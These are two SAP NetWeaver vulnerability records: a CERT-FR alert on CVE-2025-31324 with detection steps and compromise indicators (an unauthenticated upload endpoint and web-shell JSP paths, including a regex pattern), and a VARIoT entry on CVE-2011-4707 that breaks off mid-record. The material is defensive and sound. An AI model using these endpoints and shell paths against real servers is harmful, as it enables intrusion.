  • if possible, avoid shutting the machine down, so that the traces needed for the investigation are preserved;
  • keep the collected logs under seal.

The patches for the Visual Composer Framework 7.50 component are listed and available in the vendor's security note 3594142.

Workarounds are provided by the vendor [1].

Impacted products
Vendor Product Description
SAP NetWeaver NetWeaver (Visual Composer development server) versions VCFRAMEWORK 7.50 without the latest security patch


{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "NetWeaver (Visual Composer development server) versions VCFRAMEWORK 7.50 sans le dernier correctif de s\u00e9curit\u00e9",
      "product": {
        "name": "NetWeaver",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    }
  ],
  "affected_systems_content": "",
  "closed_at": "2025-06-24",
  "content": "## Identification du composant vuln\u00e9rable \n\nIl est possible de v\u00e9rifier que le composant vuln\u00e9rable Visual Composer development server est activ\u00e9 au travers de l\u0027URL `http://hote:port/nwa/sysinfo` et de chercher la pr\u00e9sence du composant  `VISUAL COMPOSER FRAMEWORK` (`VCFRAMEWORK.SCA` ou `VCFRAMEWORK`). Si la ligne indique `NO`, le composant n\u0027est pas install\u00e9.\n\n## Solutions\n\nAvant d\u0027appliquer le correctif de s\u00e9curit\u00e9, il est n\u00e9cessaire de v\u00e9rifier qu\u0027aucun fichier avec l\u0027extension `jsp`,  `java` ou `class` n\u0027est pr\u00e9sent dans les dossiers suivants :\n* `C:\\usr\\sap\\\u003cSID\u003e\\\u003cInstanceID\u003e\\j2ee\\cluster\\apps\\sap.com\\irj\\servlet_jsp\\irj\\root`\n* `C:\\usr\\sap\\\u003cSID\u003e\\\u003cInstanceID\u003e\\j2ee\\cluster\\apps\\sap.com\\irj\\servlet_jsp\\irj\\work`\n* `C:\\usr\\sap\\\u003cSID\u003e\\\u003cInstanceID\u003e\\j2ee\\cluster\\apps\\sap.com\\irj\\servlet_jsp\\irj\\work\\sync`\n\nDe plus, il est n\u00e9cessaire de v\u00e9rifier dans les journaux du serveur web : \n* des acc\u00e8s \u00e0 l\u0027URL `/developmentserver/metadatauploader` via une requ\u00eate POST avec un code HTTP 200 sans authentification ;\n* des acc\u00e8s aux URL de la forme `/irj/helper.jsp`, `/irj/cache.jsp` ou `/irj/\\w{8}.jsp`[3].\n\nEnfin il est possible de consulter [4] pour d\u0027autres indicateurs de compromission. \n*Note : Ces indicateurs n\u0027ont pas \u00e9t\u00e9 qualifi\u00e9s par le CERT-FR.*\n\u003cbr\u003e\u003c/br\u003e\nSi des fichiers malveillants ou des journaux suspects sont pr\u00e9sents : \n* signaler l\u2019\u00e9v\u00e9nement aupr\u00e8s du CERT-FR en mettant en copie vos \u00e9ventuels CSIRTs m\u00e9tier et consulter les bons r\u00e9flexes en cas d\u0027intrusion sur votre syst\u00e8me d\u0027information [5] ;\n* isoler totalement la machine concern\u00e9e du r\u00e9seau, vis-\u00e0-vis d\u0027Internet comme du r\u00e9seau interne, afin de limiter les risques de lat\u00e9ralisation ;\n* en cas d\u0027utilisation d\u0027une appliance virtuelle, r\u00e9aliser un instantan\u00e9 du syst\u00e8me de fichier et de la m\u00e9moire vive ;\n* si possible, \u00e9viter d\u0027\u00e9teindre la machine afin de conserver les traces n\u00e9cessaires aux investigations ;\n* mettre sous s\u00e9questre les journaux collect\u00e9s.\n\nLes correctifs pour le composant Visual Composer Framework 7.50 sont list\u00e9s et disponibles dans le bulletin de s\u00e9curit\u00e9 3594142 de l\u0027\u00e9diteur. \n\nDes mesures de contournements sont propos\u00e9es par l\u0027\u00e9diteur [1]. ",
  "cves": [
    {
      "name": "CVE-2025-31324",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-31324"
    }
  ],
  "links": [
    {
      "title": "Avis CERT-FR CERTFR-2025-AVI-0350 du 25 avril 2025",
      "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0350/"
    },
    {
      "title": "[4] Billet de blogue de Reliaquest relatif \u00e0 l\u0027exploitation de la vuln\u00e9rabilit\u00e9  CVE-2025-31324",
      "url": "https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/"
    },
    {
      "title": "[5] Les bons r\u00e9flexes en cas d\u2019intrusion sur un syst\u00e8me d\u2019information",
      "url": " https://www.cert.ssi.gouv.fr/les-bons-reflexes-en-cas-dintrusion-sur-un-systeme-dinformation/ "
    },
    {
      "title": "[3] Billet de blogue Rapid7 du 28 avril relatif \u00e0 la vuln\u00e9rabilit\u00e9 CVE-2025-31324",
      "url": "https://www.rapid7.com/blog/post/2025/04/28/etr-active-exploitation-of-sap-netweaver-visual-composer-cve-2025-31324/"
    },
    {
      "title": "[1] Bulletin de s\u00e9curit\u00e9 SAP 3593336 version 5 du 28/04/2025 relatif aux mesures de contournement",
      "url": "https://me.sap.com/notes/3593336"
    },
    {
      "title": "[2] FAQ sur l\u0027exploitation de la vuln\u00e9rabilit\u00e9 CVE-2025-31324",
      "url": " https://me.sap.com/notes/3596125"
    }
  ],
  "reference": "CERTFR-2025-ALE-005",
  "revisions": [
    {
      "description": "Version initiale",
      "revision_date": "2025-04-28T00:00:00.000000"
    },
    {
      "description": " Cl\u00f4ture de l\u0027alerte. Cela ne signifie pas la fin d\u0027une menace. Seule l\u0027application de la mise \u00e0 jour permet de vous pr\u00e9munir contre l\u0027exploitation de la vuln\u00e9rabilit\u00e9 correspondante.",
      "revision_date": "2025-06-24T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
    },
    {
      "description": "Contournement de la politique de s\u00e9curit\u00e9"
    }
  ],
  "summary": "Le 24 avril 2025, SAP a publi\u00e9 un bulletin de s\u00e9curit\u00e9 relatif \u00e0 la vuln\u00e9rabilit\u00e9 CVE-2025-31324 qui permet l\u0027ex\u00e9cution de code arbitraire \u00e0 distance pour un utilisateur non authentifi\u00e9. Cette vuln\u00e9rabilit\u00e9 est provoqu\u00e9e par un contournement de la politique de s\u00e9curit\u00e9 qui permet de t\u00e9l\u00e9charger des fichiers arbitraires et potentiellement ex\u00e9cutables sur le serveur. Elle impacte le composant *Visual Composer development server*, non install\u00e9 par d\u00e9faut mais fr\u00e9quemment utilis\u00e9.\n\nLe CERT-FR a connaissance de plusieurs compromissions li\u00e9es \u00e0 cette vuln\u00e9rabilit\u00e9. \n\n\nL\u0027acc\u00e8s aux d\u00e9tails complets concernant cette vuln\u00e9rabilit\u00e9 ([1] [2]) n\u00e9cessite un compte utilisateur pour le support SAP. Le bulletin de s\u00e9curit\u00e9 du 8 avril 2025 a \u00e9t\u00e9 mis \u00e0 jour pour indiquer cette nouvelle vuln\u00e9rabilit\u00e9 sans faire mention de son exploitation active.",
  "title": "Vuln\u00e9rabilit\u00e9 dans SAP NetWeaver",
  "vendor_advisories": [
    {
      "published_at": "2025-04-24",
      "title": "Bulletin de s\u00e9curit\u00e9 SAP april-2025",
      "url": " https://support.sap.com/en/my-support/knowledge-base/security-notes-news/april-2025.html "
    },
    {
      "published_at": "2025-04-24",
      "title": "Bulletin de s\u00e9curit\u00e9 SAP 3594142 version 17",
      "url": "https://me.sap.com/notes/3594142"
    }
  ]
}

VAR-201112-0297

Vulnerability from variot - Updated: 2024-07-23 22:41

Multiple cross-site scripting (XSS) vulnerabilities in the Virus Scan Interface in SAP Netweaver allow remote attackers to inject arbitrary web script or HTML via the (1) instname parameter to the VsiTestScan servlet and (2) name parameter to the VsiTestServlet servlet. The CTC service has an error when performing some verification checks and can be utilized to access user management and OS command execution functions. Input passed to the BAPI Explorer through certain transactions is not sanitised before use and can be exploited to inject arbitrary HTML and script code that is executed in the target user's browser when the malicious content is viewed. When using transaction "sa38", the RSTXSCRP report has an error and can be exploited to inject an arbitrary UNC path through the "File Name" field. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. TH_GREP has an error when processing certain SOAP requests and allows arbitrary shell commands to be injected via the "" parameter. The SPML service is susceptible to cross-site request forgery attacks, which can be used to perform arbitrary operations in the context of a logged-in user administrator, such as creating arbitrary users. SAP Netweaver is prone to multiple cross-site scripting vulnerabilities, a path traversal vulnerability, an HTML-injection vulnerability, a cross-site request-forgery vulnerability, and an authentication-bypass vulnerability. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary commands in the context of the application, disclose sensitive information, perform certain administrative actions, gain unauthorized access, or bypass certain security restrictions.


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201112-0297",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "netweaver",
        "scope": "eq",
        "trust": 5.9,
        "vendor": "sap",
        "version": "7.0"
      },
      {
        "model": "netweaver sp15",
        "scope": "eq",
        "trust": 4.5,
        "vendor": "sap",
        "version": "7.0"
      },
      {
        "model": "netweaver sp8",
        "scope": "eq",
        "trust": 4.5,
        "vendor": "sap",
        "version": "7.0"
      },
      {
        "model": "netweaver",
        "scope": "eq",
        "trust": 4.5,
        "vendor": "sap",
        "version": "7.10"
      },
      {
        "model": "netweaver",
        "scope": "eq",
        "trust": 4.5,
        "vendor": "sap",
        "version": "7.30"
      },
      {
        "model": "netweaver",
        "scope": "eq",
        "trust": 4.5,
        "vendor": "sap",
        "version": "7.02"
      },
      {
        "model": "netweaver",
        "scope": "eq",
        "trust": 4.5,
        "vendor": "sap",
        "version": "7.01"
      },
      {
        "model": "netweaver sp15",
        "scope": "eq",
        "trust": 1.4,
        "vendor": "sap",
        "version": "7.0*"
      },
      {
        "model": "netweaver sp8",
        "scope": "eq",
        "trust": 1.4,
        "vendor": "sap",
        "version": "7.0*"
      },
      {
        "model": "netweaver",
        "scope": "eq",
        "trust": 1.4,
        "vendor": "sap",
        "version": "7.10*"
      },
      {
        "model": "netweaver",
        "scope": "eq",
        "trust": 1.4,
        "vendor": "sap",
        "version": "7.30*"
      },
      {
        "model": "netweaver",
        "scope": "eq",
        "trust": 1.4,
        "vendor": "sap",
        "version": "7.02*"
      },
      {
        "model": "netweaver",
        "scope": "eq",
        "trust": 1.4,
        "vendor": "sap",
        "version": "7.01*"
      },
      {
        "model": "netweaver",
        "scope": null,
        "trust": 1.4,
        "vendor": "sap",
        "version": null
      },
      {
        "model": "netweaver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sap",
        "version": "*"
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "3e98d306-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "3a022216-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "40204c22-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4916"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4917"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4915"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4912"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4914"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4913"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4911"
      },
      {
        "db": "BID",
        "id": "50680"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003325"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201112-122"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-4707"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2011-4707"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Dmitriy Chastuchin, Dmitriy Evdokimov, Alexandr Polyakov and Alexey Tyurin of Digital Security Research Group (DSecRG)",
    "sources": [
      {
        "db": "BID",
        "id": "50680"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2011-4707",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 4.3,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2011-4707",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "IVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.2,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.9 [IVD]"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "IVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.2,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.9 [IVD]"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "IVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "3e98d306-1f7f-11e6-abef-000c29c66e3d",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.2,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.9 [IVD]"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "IVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "3a022216-1f7f-11e6-abef-000c29c66e3d",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.2,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.9 [IVD]"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "IVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "40204c22-1f7f-11e6-abef-000c29c66e3d",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.2,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.9 [IVD]"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "IVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.2,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.9 [IVD]"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "IVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.2,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.9 [IVD]"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2011-4707",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201112-122",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "IVD",
            "id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d",
            "trust": 0.2,
            "value": "MEDIUM"
          },
          {
            "author": "IVD",
            "id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d",
            "trust": 0.2,
            "value": "MEDIUM"
          },
          {
            "author": "IVD",
            "id": "3e98d306-1f7f-11e6-abef-000c29c66e3d",
            "trust": 0.2,
            "value": "MEDIUM"
          },
          {
            "author": "IVD",
            "id": "3a022216-1f7f-11e6-abef-000c29c66e3d",
            "trust": 0.2,
            "value": "MEDIUM"
          },
          {
            "author": "IVD",
            "id": "40204c22-1f7f-11e6-abef-000c29c66e3d",
            "trust": 0.2,
            "value": "MEDIUM"
          },
          {
            "author": "IVD",
            "id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d",
            "trust": 0.2,
            "value": "MEDIUM"
          },
          {
            "author": "IVD",
            "id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d",
            "trust": 0.2,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2011-4707",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "3e98d306-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "3a022216-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "40204c22-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "VULMON",
        "id": "CVE-2011-4707"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003325"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201112-122"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-4707"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple cross-site scripting (XSS) vulnerabilities in the Virus Scan Interface in SAP Netweaver allow remote attackers to inject arbitrary web script or HTML via the (1) instname parameter to the VsiTestScan servlet and (2) name parameter to the VsiTestServlet servlet. The CTC service has an error when performing some verification checks and can be utilized to access user management and OS command execution functions. Inputs passed to the BAPI Explorer through partial transactions are missing prior to use and can be exploited to inject arbitrary HTML and script code that can be executed on the target user\u0027s browser when viewed maliciously. When using transaction \\\"sa38\\\", RSTXSCRP reports an error and can be exploited to inject any UNC path through the \\\"File Name\\\" field. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. TH_GREP reports an error when processing a partial SOAP request, and can inject any SHELL command with the \\\"\u003cSTRING\u003e\\\" parameter. The SPML service allows users to perform cross-site request forgery attacks, and can log in to the user administrator context to perform arbitrary operations, such as creating arbitrary users. SAP Netweaver is prone to multiple cross-site scripting vulnerabilities, a path traversal vulnerability,  an html-injection vulnerability, a cross-site request-forgery vulnerability, and an authentication-bypass vulnerability. \nAn attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary commands in the context of the application, disclose sensitive information, perform certain administrative actions, gain unauthorized access, or bypass certain security restrictions",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2011-4707"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003325"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4917"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4911"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4913"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4914"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4912"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4915"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4916"
      },
      {
        "db": "BID",
        "id": "50680"
      },
      {
        "db": "IVD",
        "id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "40204c22-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "3a022216-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "3e98d306-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "VULMON",
        "id": "CVE-2011-4707"
      }
    ],
    "trust": 7.02
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "BID",
        "id": "50680",
        "trust": 4.6
      },
      {
        "db": "NVD",
        "id": "CVE-2011-4707",
        "trust": 4.2
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201112-122",
        "trust": 2.0
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4916",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4915",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4914",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4917",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4913",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4912",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4911",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003325",
        "trust": 0.8
      },
      {
        "db": "BUGTRAQ",
        "id": "20111117 [DSECRG-11-036] SAP NETWAVER VIRUS SCAN INTERFACE - MULTIPLE XSS",
        "trust": 0.6
      },
      {
        "db": "IVD",
        "id": "3B9467EC-1F7F-11E6-ABEF-000C29C66E3D",
        "trust": 0.2
      },
      {
        "db": "IVD",
        "id": "3D199B1E-1F7F-11E6-ABEF-000C29C66E3D",
        "trust": 0.2
      },
      {
        "db": "IVD",
        "id": "3E98D306-1F7F-11E6-ABEF-000C29C66E3D",
        "trust": 0.2
      },
      {
        "db": "IVD",
        "id": "3A022216-1F7F-11E6-ABEF-000C29C66E3D",
        "trust": 0.2
      },
      {
        "db": "IVD",
        "id": "40204C22-1F7F-11E6-ABEF-000C29C66E3D",
        "trust": 0.2
      },
      {
        "db": "IVD",
        "id": "4119FC7C-1F7F-11E6-ABEF-000C29C66E3D",
        "trust": 0.2
      },
      {
        "db": "IVD",
        "id": "4247BD6E-1F7F-11E6-ABEF-000C29C66E3D",
        "trust": 0.2
      },
      {
        "db": "VULMON",
        "id": "CVE-2011-4707",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "3e98d306-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "3a022216-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "40204c22-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4916"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4917"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4915"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4912"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4914"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4913"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4911"
      },
      {
        "db": "VULMON",
        "id": "CVE-2011-4707"
      },
      {
        "db": "BID",
        "id": "50680"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003325"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201112-122"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-4707"
      }
    ]
  },
  "id": "VAR-201112-0297",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
